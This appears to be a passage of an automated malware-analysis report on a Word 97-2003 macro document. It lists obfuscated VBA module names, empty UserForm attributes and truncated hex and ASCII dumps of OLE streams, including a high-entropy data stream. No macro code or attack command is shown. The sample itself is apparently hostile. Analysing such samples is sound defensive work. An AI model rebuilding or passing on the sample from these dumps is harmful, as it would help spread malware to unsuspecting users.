VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{E77D524C-45E0-4303-8950-534590AD4DEB}{E77862AF-692B-4B7B-BD16-0410B9AB2400}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: UserForm2, Stream Size: 1160

General
Stream Path:	Macros/VBA/UserForm2
VBA File Name:	UserForm2
Stream Size:	1160
Data ASCII:	. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 53 8f df ca 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{4550ECA8-53EF-42AC-93D5-0CA903578709}{72C9C4EB-10A3-4885-BA80-C0FBFED082ED}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: UserForm3, Stream Size: 1159

General
Stream Path:	Macros/VBA/UserForm3
VBA File Name:	UserForm3
Stream Size:	1159
Data ASCII:	. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . S . z + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 53 8f 7a 2b 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_Base
VB_Customizable
VB_TemplateDerived
VB_GlobalNameSpace

VBA Code

Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{8D32BC7D-8238-4012-A57F-F52417AD215A}{35592C14-5CE4-40FF-A081-FD92234D203F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: UserForm4, Stream Size: 1160

General
Stream Path:	Macros/VBA/UserForm4
VBA File Name:	UserForm4
Stream Size:	1160
Data ASCII:	. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . S . M x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 53 8f 4d 78 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_Customizable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{7EF12E23-BE33-47E8-84D1-A0E2D10D9A4F}{37B9FED0-64EA-4D5B-873E-97F62B7888F8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: UserForm5, Stream Size: 1159

General
Stream Path:	Macros/VBA/UserForm5
VBA File Name:	UserForm5
Stream Size:	1159
Data ASCII:	. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . S . b X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 53 8f 62 58 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived

VBA Code

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{60066BD8-8410-49CE-BA0A-DC27DC5BE897}{C9E7B34F-93A6-467E-B3A3-50233873FCED}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.2359563651
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.252421588676
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 540

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	540
Entropy:	4.15125561243
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ec 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 70 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 7215

General
Stream Path:	1Table
File Type:	data
Stream Size:	7215
Entropy:	5.85534358506
Base64 Encoded:	True
Data ASCII:	. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 99187

General
Stream Path:	Data
File Type:	data
Stream Size:	99187
Entropy:	7.38968888242
Base64 Encoded:	True
Data ASCII:	s . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . . . . h . D . 3 . . . V 8 . . . . . . . . . . . . . D . . . . . . . . F . . . . . . . . . h . D . 3 . . . V 8 . . . . . . . . .
Data Raw:	73 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 903

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	903
Entropy:	5.32016542547
Base64 Encoded:	True
Data ASCII:	I D = " { A 1 A 8 2 5 2 F - 4 1 E D - 4 3 8 E - A 9 E 2 - 8 0 E 5 6 5 2 E E F 3 3 } " . . D o c u m e n t = R 4 b m 0 1 n s b t d t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . B a s e C l a s s = U s e r F o r m 2 . . B a s e C l a s s = U s e r F o r m 3 . . B a s e C l a s s = U s e r F o r m 4 . . B a s e C l a s s = U s e r F o r m 5 . . M o d u l e = Q f e p b z t q 9 r 8 o 1 l 7 6
Data Raw:	49 44 3d 22 7b 41 31 41 38 32 35 32 46 2d 34 31 45 44 2d 34 33 38 45 2d 41 39 45 32 2d 38 30 45 35 36 35 32 45 45 46 33 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 52 34 62 6d 30 31 6e 73 62 74 64 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 284

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	284
Entropy:	3.71118828619
Base64 Encoded:	False
Data ASCII:	R 4 b m 0 1 n s b t d t 1 . R . 4 . b . m . 0 . 1 . n . s . b . t . d . t . 1 . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . U s e r F o r m 3 . U . s . e . r . F . o . r . m . 3 . . . U s e r F o r m 4 . U . s . e . r . F . o . r . m . 4 . . . U s e r F o r m 5 . U . s . e . r . F . o . r . m . 5 . . . Q f e p b z t q 9 r 8 o 1 l 7 6 . Q . f . e . p . b . z . t . q . 9 . r . 8 . o . 1 . l . 7 . 6 . . . L 6 b i h t d t n a s c .
Data Raw:	52 34 62 6d 30 31 6e 73 62 74 64 74 31 00 52 00 34 00 62 00 6d 00 30 00 31 00 6e 00 73 00 62 00 74 00 64 00 74 00 31 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 55 73 65 72 46 6f 72 6d 33 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00

Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	Macros/UserForm1/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266

General
Stream Path:	Macros/UserForm1/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	266
Entropy:	4.62034133633
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20

Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 38

General
Stream Path:	Macros/UserForm1/f
File Type:	data
Stream Size:	38
Entropy:	1.54052096453
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm1/o, File Type: empty, Stream Size: 0

General
Stream Path:	Macros/UserForm1/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: Macros/UserForm2/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	Macros/UserForm2/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266

General
Stream Path:	Macros/UserForm2/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	266
Entropy:	4.62970308443
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U s e r F o r m 2 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 32 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20

Stream Path: Macros/UserForm2/f, File Type: data, Stream Size: 38

General
Stream Path:	Macros/UserForm2/f
File Type:	data
Stream Size:	38
Entropy:	1.54052096453
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm2/o, File Type: empty, Stream Size: 0

General
Stream Path:	Macros/UserForm2/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: Macros/UserForm3/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	Macros/UserForm3/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm3/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266

General
Stream Path:	Macros/UserForm3/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	266
Entropy:	4.63438395848
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 3 . . C a p t i o n = " U s e r F o r m 3 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 33 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 33 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20

Stream Path: Macros/UserForm3/f, File Type: data, Stream Size: 38

General
Stream Path:	Macros/UserForm3/f
File Type:	data
Stream Size:	38
Entropy:	1.54052096453
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm3/o, File Type: empty, Stream Size: 0

General
Stream Path:	Macros/UserForm3/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: Macros/UserForm4/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	Macros/UserForm4/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm4/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266

General
Stream Path:	Macros/UserForm4/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	266
Entropy:	4.62402723855
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 4 . . C a p t i o n = " U s e r F o r m 4 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 34 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 34 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20

Stream Path: Macros/UserForm4/f, File Type: data, Stream Size: 38

General
Stream Path:	Macros/UserForm4/f
File Type:	data
Stream Size:	38
Entropy:	1.54052096453
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm4/o, File Type: empty, Stream Size: 0

General
Stream Path:	Macros/UserForm4/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: Macros/UserForm5/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	Macros/UserForm5/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/UserForm5/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266

General
Stream Path:	Macros/UserForm5/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	266
Entropy:	4.62202697924
Base64 Encoded:	True
